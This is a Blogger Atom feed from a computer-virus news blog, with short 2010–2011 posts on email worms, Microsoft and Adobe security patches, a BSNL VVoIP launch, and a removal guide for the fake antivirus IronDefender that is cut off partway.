<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-241363155045937421</id><updated>2011-11-27T17:11:51.712-08:00</updated><category term='flash'/><category term='cabir'/><category term='SWScript.LFM'/><category term='Code Red. Code Red II'/><category term='bugs'/><category term='resident virus'/><category term='blacklisted websites'/><category term='malware'/><category term='USBcillin'/><category term='biosmemory()'/><category term='here you have'/><category term='adobe'/><category term='US Marshals'/><category term='patches'/><category term='Booting'/><category term='windows 7'/><category term='removal'/><category term='Virus attack'/><category term='cracking'/><category term='Booting from infected disk'/><category term='FTP'/><category term='flaw'/><category term='keylogger'/><category term='Stone Virus'/><category term='digg attack'/><category term='zombie'/><category term='dropper'/><category term='email'/><category term='Denial of Service (DoS) attack'/><category term='real time protection'/><category term='camouflage'/><category term='Autoruns'/><category term='precautions'/><category term='IP address spoofing'/><category term='fraud'/><category term='London hospitals'/><category term='bootstrap virus'/><category term='FBI'/><category term='sleeper'/><category term='nuker'/><category term='rootkit'/><category term='adware'/><category term='service pack'/><category term='RootkitRevealer'/><category term='Vaccine'/><category term='sinowal'/><category term='macromediaflash'/><category term='Anti-Virus'/><category term='worm'/><category term='swf'/><category term='fun'/><category term='Types of viruses'/><category term='Netsky'/><category term='scam'/><category term='MyDoom'/><category term='antivirus 2010'/><category term='Viruses'/><category term='software killers'/><category term='Deepfreeze'/><category term='ILOVEYOU'/><category term='invible folder'/><category term='computer virus'/><category term='proxy'/><category term='computer security'/><category term='Sasser'/><category term='bootloader'/><category term='commwarrior'/><category term='Skulls'/><category term='antivirus 2009'/><category term='virus code'/><category term='wingate'/><category term='trojans'/><category term='kaspersky'/><category term='crimewares'/><category term='Storm Worm'/><category term='french fighter'/><category term='ashley'/><category term='e-banking'/><category term='SQL Slammer/Sapphire'/><category term='Cyber Spying'/><category term='spoofing'/><category term='windows 7 security'/><category term='conflicker'/><category term='spyware'/><category term='new virus'/><category term='RAM size'/><category term='firewall'/><category term='Crazy Boot'/><category term='Facebook'/><category term='Melissa'/><category term='Reading the memory'/><category term='mobile virus'/><category term='Irondefender'/><category term='File viruses'/><category term='symptoms'/><category term='Klez'/><category term='0x413'/><category term='internet security'/><category term='disabling autoruns'/><category term='Chrome OS'/><category term='Apocalyptic'/><category term='Symptoms of virus infection'/><category term='notepad virus'/><category term='website'/><category term='hackers'/><category term='DUTS'/><category term='Google'/><category term='Curing'/><category term='anti-trojan'/><category term='Nimda'/><category term='anti spyware 2010'/><category term='anderson'/><category term='internetsecurity'/><category term='Actifed'/><category term='Leap-A/Oompa-A'/><category term='virus'/><category term='source code'/><category term='Zeus'/><category term='security patches'/><category term='bootstrap'/><category term='sality'/><category term='mobilevirus'/><category term='password'/><category term='new virus list'/><category term='BitLocker'/><category term='Mysterious'/><title type='text'>Computer Virus</title><subtitle type='html'>The blog contains information about different types of viruses and properties of viruses.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>80</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4389870093581481648</id><published>2011-08-08T08:57:00.000-07:00</published><updated>2011-08-08T08:57:08.286-07:00</updated><title type='text'>BSNL launches VVoIP service in India</title><content type='html'>&lt;p&gt;The state run Telecom company BSNL has launched yet another ground breaking service in India after Voice over Internet Protocol (VoIP). The new service is Voice and Video over Internet Protocol (VVoIP).&lt;/p&gt;&lt;p&gt;&lt;a href="http://img28.imageshack.us/img28/9790/bsnl.jpg" target="_self" &gt;&lt;table align="right"&gt;&lt;caption align="bottom"&gt;&lt;/caption&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;img alt="BSNL Logo" src="http://img88.imageshack.us/img88/8762/bsnlpreview.jpg" border="0" hspace="8" align="right" width="112" height="115" /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Using this service BSNL customers can make audio and video calls at their will using land phone or mobile or Internet Protocol phone anywhere in the world, provided both ends must have video phones.&lt;/p&gt;&lt;p&gt;BSNL has partnered with Sai Infosystem (SiS) to make this a reality. The service was initially available in Ahmedabad. But by the end of this month, the service will be available in entire Gujarat. By the end of March 2012, whole India will be under the coverage. According to BSNL, the new service will be more economical than the conventional services. BSNL is working with major international carriers to ensure trouble free service.&lt;/p&gt;&lt;p&gt;The customers will be charged 40 paise per minute for audio and Rs 2 per minute for video calls within the country using VVoIP. The international tariff is also low. The VVoIP service can be made available with a monthly rental of just Rs 150.&lt;table align="right"&gt;&lt;caption align="bottom"&gt;&lt;/caption&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://img28.imageshack.us/img28/9790/bsnl.jpg" target="_self" &gt;&lt;/a&gt;&lt;a href="http://img28.imageshack.us/img28/9790/bsnl.jpg" target="_self" &gt;&lt;/a&gt;&lt;a href="http://img28.imageshack.us/img28/9790/bsnl.jpg" target="_self" &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4389870093581481648?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4389870093581481648/comments/default' title='Post Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4389870093581481648'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4389870093581481648'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2551764964734437180</id><published>2010-10-14T08:29:00.000-07:00</published><updated>2010-10-14T08:29:00.916-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computer virus'/><category scheme='http://www.blogger.com/atom/ns#' term='ashley'/><category scheme='http://www.blogger.com/atom/ns#' term='email'/><category scheme='http://www.blogger.com/atom/ns#' term='anderson'/><title type='text'>New e-mail virus: email from Ashley Anderson</title><content type='html'>As the days are passing by, more and more malwares are released into the cyber space causing agony to the computer users. Now a new email virus has been reported. When you check e-mails, if you found an email from Ashely Anderson, then delete it imediately as it is a virus. The email comes with an attachment and the name of the sender made the people open the attachment and causes damage to their computers. So if you receive such an email, please dont open it, just delete it. It is supposed that the attachment contains a trojan that will copy the files from the system and also damages the files. Since it is a trojan, there is a high chance for the stealing of valuable data in the computer including details of the bank accounts. The trojan allow the sender to intrude into the victims computer and can control the victims computer or stole valuable data from the victim's computer. The easiest way to avoid any kind of problems, as per the experts, is to delete the email immediately.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px;" width="125" /&gt;&lt;/a&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2551764964734437180?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2551764964734437180/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/10/new-e-mail-virus-email-from-ashley.html#comment-form' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2551764964734437180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2551764964734437180'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/10/new-e-mail-virus-email-from-ashley.html' title='New e-mail virus: email from Ashley Anderson'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-1626761952542097110</id><published>2010-10-13T06:48:00.000-07:00</published><updated>2010-10-13T06:48:56.168-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='patches'/><category scheme='http://www.blogger.com/atom/ns#' term='security patches'/><title type='text'>Microsoft releases security patches to fix 49 vulnerabilities</title><content type='html'>&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Microsoft on Tuesday, released its largest ever batch of security patches to fix a record 49 vulnerabilities in Internet Explorer, Windows and other software.The Internet Explorer patch is aimed at fixing as many as twelve vulnerabilities. Due to the risk of zero-click drive-by download attacks, the company is suggesting Windows users to apply this patch immediately. The IE versions 7 and 8 running on Windows Vista and Windows 7 are said to be vulnerable to concerned attacks though these versions are claimed to have lessen the affect of such attacks.&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_mPzqYV2-K04/TLW35Qi3ZdI/AAAAAAAAALI/yiRS1tk7uew/s1600/ms_patch.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" ex="true" src="http://4.bp.blogspot.com/_mPzqYV2-K04/TLW35Qi3ZdI/AAAAAAAAALI/yiRS1tk7uew/s1600/ms_patch.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Numerous other holes also make it possible to run a malicious code in the Windows common control library as well as the Microsoft foundation class library. But, these holes carried lesser ratings as they can be exploited only on using third-party browsers and file-archiving programs.&lt;/div&gt;The patches also fix vulnerability in Windows XP which was exploited by the Stuxnet worm that is believed to have been released in order to disrupt Iran's nuclear program. The malware spread by exploiting four formerly unpatched Windows security holes. Tuesday's security release fixes three of these holes, while the fourth will be fixed in a future update.&lt;br /&gt;According to Symantec (Norton Antivirus Provider), out of the total 49 flaws, 35 could give hackers the means to run malicious code on victim's computers. Microsoft has already released 86 security patches so far this year, as compared with a total of 74 security bulletins in the previous year.&lt;br /&gt;&amp;nbsp; &lt;br /&gt;&amp;nbsp; &lt;br /&gt;&amp;nbsp; &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px;" width="125" /&gt;&lt;/a&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-1626761952542097110?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/1626761952542097110/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/10/microsoft-releases-security-patches-to.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/1626761952542097110'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/1626761952542097110'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/10/microsoft-releases-security-patches-to.html' title='Microsoft releases security patches to fix 49 vulnerabilities'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_mPzqYV2-K04/TLW35Qi3ZdI/AAAAAAAAALI/yiRS1tk7uew/s72-c/ms_patch.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8489428665125424716</id><published>2010-09-16T05:55:00.000-07:00</published><updated>2010-09-16T05:55:28.732-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='email'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><category scheme='http://www.blogger.com/atom/ns#' term='here you have'/><title type='text'>'Here you have' e-mail virus threatens the computer world</title><content type='html'>Recently a massive virus hit e-mail accounts across the world, including the major corporation gaints like Google, Coca-cola, NASA. The trojan virus spread through e-mails with subject lines that read 'Here You Have,' while other versions of worm are hidden under the subject lines like 'This is The Free Download Sex Movies, you can find it here,' and 'Just For You.' Each e-mail contained a link that, if clicked, would download malware into a recepient's computer, and send a wave of similar e-mails to his or her contacts. Although the exact number of victims are not known, the virus attack has forced several employees to abandon their e-mail accounts altogather.&lt;br /&gt;McAfee published a report on its blog, saying that the risk of infection on both home and work e-mail accounts is "low," while acknowledging that it may take time to root out all of the virus's multiple variants. The security firm also identified the virus as a trojan horse, but had not yet determined its origins. Symantec, meanwhile, told ABC that the worm, which it has called 'W32.Imsolk.A@mm,' is similar to the 'Anna Kournikova' worm that hit computers in 2001, and also spread under the 'Here You Have' subject.&amp;nbsp;If you receive&amp;nbsp;e-mails with suspicious subject lines, delete them instantly. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px;" width="125" /&gt;&lt;/a&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8489428665125424716?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8489428665125424716/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/09/here-you-have-e-mail-virus-threatens.html#comment-form' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8489428665125424716'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8489428665125424716'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/09/here-you-have-e-mail-virus-threatens.html' title='&apos;Here you have&apos; e-mail virus threatens the computer world'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2841914369074589364</id><published>2010-09-15T04:45:00.000-07:00</published><updated>2010-09-15T04:45:30.245-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugs'/><category scheme='http://www.blogger.com/atom/ns#' term='flaw'/><category scheme='http://www.blogger.com/atom/ns#' term='patches'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><category scheme='http://www.blogger.com/atom/ns#' term='adobe'/><category scheme='http://www.blogger.com/atom/ns#' term='flash'/><category scheme='http://www.blogger.com/atom/ns#' term='hackers'/><title type='text'>Adobe sounds alarm about the attacks on Flash</title><content type='html'>Adobe has warned the users of its pdf reader about the bugs in the reader and hackers were exploiting these bugs. But now it has come up with the shocking news of the bugs in the one of the most popular software- Adobe Flash. It is a matter of worry since almost all the computer users view video in their browsers with the help of Flash software. However the company told that it would patch Flash in two weeks and Reader in three weeks.In a new security advisory on Monday, Adobe said that the current version of Flash contains a critical flaw already being used in the wild by criminals to attack Windows PCs. According to the advisory,&amp;nbsp; "This vulnerability could cause a crash and potentially allow an attacker to take control of the affected system".&lt;br /&gt;Unfortunately, the flaw is present in all the Flash including the editions for Mac, Linux, Android.. But Adobe described the attacks as "targeted" and limited". The attacks were targeted against the windows users. The same bug is also present in Adobe Reader and Acrobat, the company's free PDF viewer, and its commercial PDF creation tool. This is quite natural since both Reader and Acrobat include code to run Flash content embedded in PDF documents, making a bug in Adobe's media player typically require a patch for the PDF programs.&lt;br /&gt;Adobe said it would update Flash to fix that program's flaw in two weeks, sometime during the week of Sept. 27. The two bugs in Reader and Acrobat -- the one disclosed last week and Monday's -- will be patched in the week of Oct. 4 with an emergency, or out-of-band security update.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px;" width="125" /&gt;&lt;/a&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2841914369074589364?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2841914369074589364/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/09/adobe-sounds-alarm-about-attacks-on.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2841914369074589364'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2841914369074589364'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/09/adobe-sounds-alarm-about-attacks-on.html' title='Adobe sounds alarm about the attacks on Flash'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6950268050661519810</id><published>2010-09-14T05:06:00.000-07:00</published><updated>2010-09-14T05:06:52.350-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Irondefender'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='removal'/><title type='text'>How to remove IronDefender</title><content type='html'>I have written articles about several malwares that disguises themselves as the malware removal tool. Here is one more malware that disguises itself as the useful malware removal tool. It's function is almost same as that of the other disguised malwares. It does not scan your computer or find any virus or malware. When IronDefender is installed in a computer it will start along with windows on the next booting. It will perform a fake scan and informs the user that a harmful malware is present in his computer and it has to be removed. It asks the user to register IronDefender by paying a price for registration. Actually the message is a lie to make the poor victim to pay for the malware.&lt;br /&gt;IronDefender will display options that other genuine antivirus as- "Full Scan", "System Scan", "Scan Basic Locations", "Scan Removable Media", "Scan Folder", "Realtime protection" and "Tools". All of the features do not really protect the computer but just show the fake functions only. &lt;br /&gt;If you are a victim of the IronDefender, ir has to be removed immediately !....&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;u&gt;&lt;span style="color: magenta;"&gt;Removal:&lt;/span&gt;&lt;/u&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Kill the process&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;F0E84.exe&lt;/em&gt;&lt;br /&gt;&lt;em&gt;vur4.exe&lt;/em&gt;&lt;br /&gt;&lt;em&gt;[random].exe&lt;/em&gt; &lt;br /&gt;&lt;em&gt;&lt;/em&gt;&amp;nbsp; &lt;br /&gt;&lt;u&gt;Delete the registry&lt;/u&gt; &lt;br /&gt;&amp;nbsp; &lt;br /&gt;&lt;em&gt;HKEY_CURRENT_USER\Software\IronDefender&lt;/em&gt; &lt;br /&gt;&lt;em&gt;HKEY_LOCAL_MACHINE\SOFTWARE\IronDefender&lt;/em&gt;&lt;br /&gt;&lt;em&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IronDefender&lt;/em&gt;&lt;br /&gt;&lt;em&gt;HKEY_CURRENT_USER\Software "Install_Dir" = "C:\Program Files\FDFCA"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "vur4.exe"&lt;/em&gt;&lt;br /&gt;&lt;em&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "F0E84.exe"&lt;/em&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;u&gt;Delete the files and folders&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;%ALLUSERSPROFILE%\Start Menu\Programs\IronDefender.lnk&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%ProgramFiles%\FDFCA\&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%ProgramFiles%\FDFCA\F0E84.exe&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%ProgramFiles%\FDFCA\Uninstall.exe&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%SystemRoot%\[random].exe&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%SystemRoot%\[random].bin&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%SystemRoot%\[random].dll&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%SystemRoot%\[random].cpl&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%SystemRoot%\system32\[random].exe&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%SystemRoot%\system32\[random].bin&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%SystemRoot%\system32\[random].dll&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%SystemRoot%\system32\[random].cpl&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%UserProfile%\Desktop\hash&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%UserProfile%\Desktop\IronDefender.lnk&lt;/em&gt;&lt;br /&gt;&lt;em&gt;%UserProfile%\Local Settings\Temp\[random].exe&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px;" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div 